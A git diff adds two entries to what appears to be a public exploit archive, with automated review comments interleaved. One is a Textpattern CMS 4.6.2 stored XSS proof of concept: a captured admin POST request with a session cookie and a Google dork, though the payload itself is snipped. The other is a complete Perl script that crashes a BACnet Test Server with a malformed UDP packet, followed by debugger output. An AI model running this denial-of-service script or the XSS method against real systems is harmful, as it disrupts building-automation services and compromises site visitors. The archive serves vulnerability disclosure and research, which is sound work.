diff --git a/exploits/php/webapps/48861.txt b/exploits/php/webapps/48861.txt
new file mode 100644
index 000000000..024e60237
--- /dev/null
+++ b/exploits/php/webapps/48861.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting
+# Exploit Author: Alperen Ergel
+# Web Site: https://alperenae.gitbook.io/
+# Software Homepage: https://textpattern.com/
+# Version : 4.6.2
+# Tested on: windows 10 / xammp
+# Category: WebApp
+# Google Dork: intext:"Published with Textpattern CMS"
+# Date: 2020-10-29
+# CVE :-
+######## Description ########
+#
+# 1-) Loggin administrator page
+#
+# 2-) Write new blog add payload to 'body'
+#
+# 3-) Back to web site then will be work payload
+#
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+POST /textpattern/textpattern/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost/textpattern/textpattern/index.php?event=article&ID=3
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------127132438115577379281797109093
+Content-Length: 6080
+Connection: close
+Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40; __atuvs=5f77129c504c17ce000
+
+### SNIPPP HERE ####
+
+-----------------------------127132438115577379281797109093
+Content-Disposition: form-data; name="Title"
+
+XSS
+-----------------------------127132438115577379281797109093
+Content-Disposition: form-data; name="textile_body"
+
+1
+-----------------------------127132438115577379281797109093
+Content-Disposition: form-data; name="Body"
+
+
+-----------------------------127132438115577379281797109093
\ No newline at end of file
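Review bot: The `# Date: 2020-10-29` header in this advisory disagrees with the `files_exploits.csv` entry added later in the same commit, which records `2020-10-07` for the same file; one of the two dates should be corrected so the index and the advisory agree. The captured `Cookie:` header publishes a `txp_login` session value from the test instance; even for a localhost setup a PoC should carry a placeholder such as `Cookie: txp_login=<REDACTED>` rather than a real token. The reproduction steps start with an administrator login (step 1), so the description should state explicitly that the issue requires an authenticated privileged account, which bounds its impact for anyone triaging it.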
diff --git a/exploits/windows/dos/48860.txt b/exploits/windows/dos/48860.txt
new file mode 100644
index 000000000..f2f655322
--- /dev/null
+++ b/exploits/windows/dos/48860.txt
@@ -0,0 +1,113 @@
+# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC)
+# Date: 2020-10-07
+# Author: LiquidWorm
+# Vendor: https://www.bac-test.com
+# Product link: https://sourceforge.com/projects/bacnetserver
+# CVE: N/A
+
+
+#!/usr/bin/perl
+#
+# BACnet Test Server 1.01 Remote Denial of Service Exploit
+#
+#
+# Vendor: BACnet Interoperability Test Services, Inc.
+# Product web page: https://www.bac-test.com
+# https://sourceforge.com/projects/bacnetserver
+# Affected version: 1.01 (BACnet Stack Version 0.5.7)
+#
+# Summary: This is a simple BACnet Server aimed at developers who
+# want to explore or test their BACnet Client implementations of
+# the ASHRAE BACnet protocol. It is based on Steve Karg's fine
+# implementation of the BACnet Stack.
+#
+# Desc: The BACNet Test Server is vulnerable to a denial of service
+# (DoS) vulnerability when sending malformed BVLC Length UDP packet
+# to port 47808 causing the application to crash.
+#
+# Type - 0x81
+# BVLC Function
+# - 0x01 - Write Broadcast Distribution Table
+# - 0x02 - Read Broadcast Distribution Table
+# - 0x03 - Read Broadcast Distribution Table ACK
+# - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header
+# - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds
+# - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router.
+# Optional Originating Device IP address and Port NOT included in BVLL header.
+# - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks.
+# - 0x0c - Secure-BVLL
+# - BVLL Length
+# - IP address of Originating Device - optional depending on BVLC Function Code
+# - Port number of Originating Device - optional depending on BVLC Function Code
+# - NPDU - Network Layer Protocol Data Unit
+#
+# =================================================================
+# (67c.2f34): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe
+# eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00
+# eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc
+# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
+# Server+0x34313:
+# 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=??
+# 0:000> d 994313 +77
+# 0099438a cccccccc
+# 0099438e cccccccc
+# 00994392 cccccccc
+# 00994396 cccccccc
+# 0099439a cccccccc
+# 0:000> d esp
+# 005fec04 005ff3f8
+# 005fec08 005ff408
+# 005fec0c 00692000
+# 005fec10 cccccccc
+# 005fec14 cccccccc
+# 004fec18 cccccccc
+# =================================================================
+#
+# Tested on: Microsoft Windows 10 Professional (EN)
+# Microsoft Windows 7 Professional SP1 (EN)
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5597
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php
+#
+#
+# 05.08.2019
+#
+
+use strict;
+use warnings;
+use IO::Socket::INET;
+
+my $target = "10.0.99.34";
+my $porta = 47808;
+my $proto = "udp";
+my $stype = SOCK_DGRAM;
+my $timeout = 1;
+
+my $socket = new IO::Socket::INET (
+PeerHost => $target,
+PeerPort => $porta,
+Proto => $proto,
+Type => $stype,
+Timeout => $timeout
+) or die "Socket error.
: $!\n";
+
+print "Connected to: $target:$porta\n";
+
+$| = 1;
+binmode $socket;
+
+my $data = "\x81\x09\xFF\xFE";
+
+print "Sending: $data [ ".length($data)." bytes ]\n";
+send ($socket, $data, 0) or die "Nope: $!\n";
+print "Done.\n";
+
+$socket->close();
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f80481f53..4a039ca57 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5792,6 +5792,7 @@ id,file,description,date,author,type,platform,port
 42781,exploits/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",dos,multiple,
 42782,exploits/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",dos,multiple,
 42783,exploits/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",dos,multiple,
+48860,exploits/windows/dos/48860.txt,"BACnet Test Server 1.01 - Remote Denial of Service (PoC)",2020-10-07,LiquidWorm,dos,windows,
 42917,exploits/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",dos,windows,
 42920,exploits/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,dos,windows,
 42932,exploits/linux/dos/42932.c,"Linux Kernel < 4.14.rc3 - Local Denial of Service",2017-10-02,"Wang Chenyu",dos,linux,
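Review bot: `my $socket = new IO::Socket::INET (` uses indirect object syntax, which `use strict` and `use warnings` do not catch and which can be misparsed; write it as `my $socket = IO::Socket::INET->new(` so the constructor call is unambiguous. The `print "Sending: $data [ ...` line interpolates the raw bytes of `$data` into terminal output, where they are non-printable; `unpack('H*', $data)` would render them as hex without changing what is sent. The `Timeout => $timeout` option appears to have no effect on a `SOCK_DGRAM` socket that only issues a single `send`, so it can probably be dropped. The `die "Socket error. : $!\n"` message is broken across two lines in this view, which suggests a stray character in the committed file that is worth checking.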
@@ -40678,6 +40679,7 @@ id,file,description,date,author,type,platform,port
 48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php,
 48857,exploits/hardware/webapps/48857.txt,"Karel IP Phone IP1211 Web Management Panel - Directory Traversal",2020-10-06,"berat isler",webapps,hardware,
 48858,exploits/json/webapps/48858.txt,"EasyPMS 1.0.0 - Authentication Bypass",2020-10-06,Jok3r,webapps,json,
+48861,exploits/php/webapps/48861.txt,"Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting",2020-10-07,"Alperen Ergel",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,